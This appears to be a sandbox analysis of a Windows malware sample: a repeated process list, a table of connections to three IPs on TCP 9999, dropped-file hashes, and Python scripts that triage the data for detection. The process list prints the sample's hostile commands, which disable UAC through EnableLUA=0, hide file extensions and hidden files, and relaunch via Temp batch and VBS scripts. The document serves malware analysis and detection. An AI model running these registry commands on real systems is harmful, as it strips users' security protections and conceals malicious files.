C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PKcEcskk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fwgkQUsY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eqMskUwY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AEcgwQsQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eqswUsow.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LQIcwsYQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SCQQksMk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\TAAEYsog.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NIEMYYgc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PoAsEYIM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "800290335-1759537852-1215392385-392837485-1830295252-1349181723-326661077168394496"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zkIkIIkU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\uwUYssck.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vecAwogc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\kycMMsso.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eOswgwoQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
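
Every relaunch in the list above runs the same four command lines: three `reg add` calls (hide file extensions, hide hidden files, set EnableLUA to 0) and a `cmd /c` launcher that passes the dropper's own path to a batch file in Temp, which then runs `cscript` on `file.vbs`. The Python below is an added example, not part of the sandbox output, that parses those command lines (copied from the list) and maps them to the report's own signature names; the rule labels, the `WELL_KNOWN`-style lookup tables and the regexes are this script's assumptions. Two caveats a practitioner should keep in mind: writing EnableLUA under `HKLM\...\Policies\System` only succeeds when the process already holds administrative rights, and the value takes effect at the next logon, so this weakens UAC for later runs rather than bypassing a live prompt. The `cmd /c "...N"` form with no extension is resolved by cmd through PATHEXT, which is why the listing shows the `.exe` image running with the extensionless command line.

```python
"""Classify sandbox process command lines against the report's signatures.

Added example; not part of the sandbox output.  COMMAND_LINES are copied
from the Processes section above.  Rule names and regexes are this
script's own.
"""
import re
from collections import Counter

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"
SAMPLE_NOEXT = SAMPLE[:-4]

COMMAND_LINES = [
    '"' + SAMPLE + '"',
    r'"C:\Users\Admin\tIUAwkcA\WYUQIMko.exe"',
    r'"C:\ProgramData\XggMMcAg\LkAAYskU.exe"',
    'cmd /c "' + SAMPLE_NOEXT + '"',
    SAMPLE_NOEXT,
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1',
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2',
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f',
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\IWMgwYQg.bat" "' + SAMPLE + '""',
    r'cscript C:\Users\Admin\AppData\Local\Temp/file.vbs',
]

# (key path below the hive, value name, data) -> label; all lower-cased.
REG_RULES = {
    (r"software\microsoft\windows\currentversion\explorer\advanced", "hidefileext", "1"):
        "Modifies visibility of file extensions in Explorer (HideFileExt=1)",
    (r"software\microsoft\windows\currentversion\explorer\advanced", "hidden", "2"):
        "Hides hidden files and folders in Explorer (Hidden=2)",
    (r"software\microsoft\windows\currentversion\policies\system", "enablelua", "0"):
        "UAC disabled at next logon via EnableLUA=0 (report: 'UAC bypass')",
}

REG_ADD = re.compile(r"^reg(?:\.exe)?\s+add\s+(\S+)\s+(.*)$", re.I)
SWITCH = re.compile(r"/([vtd])\s+(\S+)", re.I)          # /v name, /t type, /d data
FORCE = re.compile(r"(?:^|\s)/f(?:\s|$)", re.I)           # /f takes no argument
BAT_LAUNCH = re.compile(r'^cmd(?:\.exe)?\s+/c\s+""([^"]+\.bat)"\s+"([^"]+)""$', re.I)
QUOTED_RELAUNCH = re.compile(r'^cmd(?:\.exe)?\s+/c\s+"([^"]+)"$', re.I)
CSCRIPT = re.compile(r"^cscript(?:\.exe)?\s+(\S+)", re.I)


def parse_reg_add(cmdline):
    """Return the parsed fields of a `reg add`, or None.

    Both switch orders seen in the report are handled
    (/f /v X /t T /d D  and  /v X /d D /t T /f).
    """
    m = REG_ADD.match(cmdline.strip())
    if not m:
        return None
    key, args = m.group(1), m.group(2)
    opts = {k.lower(): v for k, v in SWITCH.findall(args)}
    hive, _, path = key.partition("\\")
    return {
        "hive": hive.upper(),
        "path": path.lower(),
        "value": opts.get("v", "").lower(),
        "type": opts.get("t", "REG_SZ").upper(),
        "data": opts.get("d", ""),
        "force": FORCE.search(args) is not None,
    }


def classify(cmdline):
    """Labels triggered by one command line (empty list if none)."""
    hits = []
    reg = parse_reg_add(cmdline)
    if reg:
        label = REG_RULES.get((reg["path"], reg["value"], reg["data"]))
        if label:
            hits.append(label)
        elif reg["hive"] == "HKLM":
            hits.append("Writes machine-wide registry key: " + reg["path"])
        return hits
    m = BAT_LAUNCH.match(cmdline)
    if m:
        hits.append("Batch launcher in Temp given the dropper's path as argument "
                    "(the pattern behind the report's 'Deletes itself' signature)")
        return hits
    m = QUOTED_RELAUNCH.match(cmdline)
    if m and not m.group(1).lower().endswith(".exe"):
        hits.append("cmd /c relaunch of the sample by extensionless path")
        return hits
    m = CSCRIPT.match(cmdline)
    if m:
        hits.append("Script host (cscript) run on " + m.group(1))
    return hits


def triage(cmdlines):
    """Counter of labels over a whole process list."""
    counts = Counter()
    for line in cmdlines:
        counts.update(classify(line))
    return counts


if __name__ == "__main__":
    for label, n in triage(COMMAND_LINES).most_common():
        print(n, label)
```

The lookup is keyed on path, value name and data together on purpose: HideFileExt=0 or Hidden=1 are the user-friendly settings and should not fire, and EnableLUA written with any value other than 0 is an unrelated change. Fed the full Processes section, the three registry labels and the launcher label each fire once per relaunch, which is the clearest per-cycle marker of this sample's loop.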

Network

Country  Destination          Domain      Proto
BO       200.87.164.69:9999   -           tcp
US       8.8.8.8:53           google.com  udp
GB       142.250.200.14:80    google.com  tcp
BO       200.87.164.69:9999   -           tcp
GB       142.250.200.14:80    google.com  tcp
BO       200.119.204.12:9999  -           tcp
BO       200.119.204.12:9999  -           tcp
BO       190.186.45.170:9999  -           tcp
BO       190.186.45.170:9999  -           tcp
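
The Network table mixes sandbox noise (DNS and HTTP to google.com) with the connections that matter: three public IPs, all geolocated to BO, each contacted twice directly by address on TCP 9999 with no name resolution. The Python below is an added example, not part of the sandbox report, that parses the rows as they appear in the table (the Domain column is simply absent for the direct-to-IP rows, so 3- and 4-field lines must both be accepted), collapses the repeats, and separates C2 candidates from noise. The rows are copied from the table; the well-known-port set and the candidate rule are this script's assumptions.

```python
"""Triage the Network table of a sandbox report.

Added example; not part of the sandbox report.  NETWORK_ROWS is copied
from the table above.  WELL_KNOWN_PORTS and is_c2_candidate() are this
script's own heuristics.
"""
import ipaddress
from collections import Counter

NETWORK_ROWS = """\
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
GB 142.250.200.14:80 google.com tcp
BO 200.87.164.69:9999 tcp
GB 142.250.200.14:80 google.com tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp
"""

# Ports treated as expected sandbox background traffic (DNS, HTTP, HTTPS).
WELL_KNOWN_PORTS = {53, 80, 443}


def parse_network(text):
    """Parse 'Country Destination [Domain] Proto' rows; Domain may be missing."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 3:
            country, dest, proto = fields
            domain = None
        elif len(fields) == 4:
            country, dest, domain, proto = fields
        else:
            raise ValueError("unexpected row: " + line)
        host, _, port = dest.rpartition(":")
        rows.append({
            "country": country,
            "ip": ipaddress.ip_address(host),
            "port": int(port),
            "domain": domain,
            "proto": proto.lower(),
        })
    return rows


def is_c2_candidate(row):
    """Direct-to-IP, globally routable, on a port outside the noise set."""
    return (row["domain"] is None
            and row["port"] not in WELL_KNOWN_PORTS
            and row["ip"].is_global)


def c2_summary(rows):
    """{(ip, port): connection count} for the C2 candidates only."""
    hits = Counter((str(r["ip"]), r["port"]) for r in rows if is_c2_candidate(r))
    return dict(hits)


def infrastructure_profile(rows):
    """Distinct IPs, ports and countries across the candidates.

    One port and one country shared by several addresses points to a
    fixed-port fallback list rather than CDN or update traffic.
    """
    cands = [r for r in rows if is_c2_candidate(r)]
    return {
        "ips": sorted({str(r["ip"]) for r in cands}),
        "ports": sorted({r["port"] for r in cands}),
        "countries": sorted({r["country"] for r in cands}),
    }


if __name__ == "__main__":
    parsed = parse_network(NETWORK_ROWS)
    for (ip, port), n in sorted(c2_summary(parsed).items()):
        print(f"{ip}:{port}  x{n}")
    print(infrastructure_profile(parsed))
```

The two connection attempts per address, with the same port on all three, are what to block and hunt on: an egress rule for TCP 9999 to those addresses, plus a search for any host that has touched more than one of them, since a beacon cycling through a fallback list will touch them in turn.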

Files

memory/2352-0-0x0000000000400000-0x0000000000434000-memory.dmp

\Users\Admin\tIUAwkcA\WYUQIMko.exe

MD5 15c32f5d27df33284d113ece95f18ab3
SHA1 c610b1882ebf9c4849f5090d3d31e3ec6afaef6b
SHA256 e6a261f222632cba2f3158ffe188a4268f69aa3161b2e242243bd1452f493d6a
SHA512 220552b46c31b0603938bfeb83cdda8c7a92d378094643331930de41a9878a15759d22b29cdb5c61c1da48eeaeb7dfb1c0c5c929277c21a0ce777a81d66527cd

memory/2352-5-0x0000000003DB0000-0x0000000003DDF000-memory.dmp

memory/2900-13-0x0000000000400000-0x000000000042F000-memory.dmp

\ProgramData\XggMMcAg\LkAAYskU.exe

MD5 2ab37735d1252978401c416ceaa2166b
SHA1 f1b61163d9c4f4d7e785ab85e896d266b3de4ba4
SHA256 c5499c6b3a99f301cf84ac538964209d9deba921b4fbb8e86e59a00df3851afa
SHA512 bde085a189deb080d9edc54e7cc2b0bf8661e41f13c03485630eb7c61dcd02864f0e634da20c62e2a81c15b14728ed3ae0960634eee7315f07fb526b05501b25

memory/2352-16-0x0000000003DB0000-0x0000000003DE2000-memory.dmp

memory/1800-31-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2352-29-0x0000000003DB0000-0x0000000003DE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nKUcAUAk.bat

MD5 bd36b88e766802a29d69e9ce1477146e
SHA1 d899a5b462c421b22b636f1a34c8b7ae66da3fda
SHA256 d909028517c054943b8835eb1e7f100669faacba0834197aee8cbf977f443edb
SHA512 9ad3c8fe08d597a3d9a3086be54d83dbe3bfb1d069405e33d0731539b627b3e627839be9267996560a7afbc49ff2660c26bca67143866592f2fccba924600e65

memory/2512-33-0x0000000000340000-0x0000000000374000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IWMgwYQg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/2352-43-0x0000000000400000-0x0000000000434000-memory.dmp

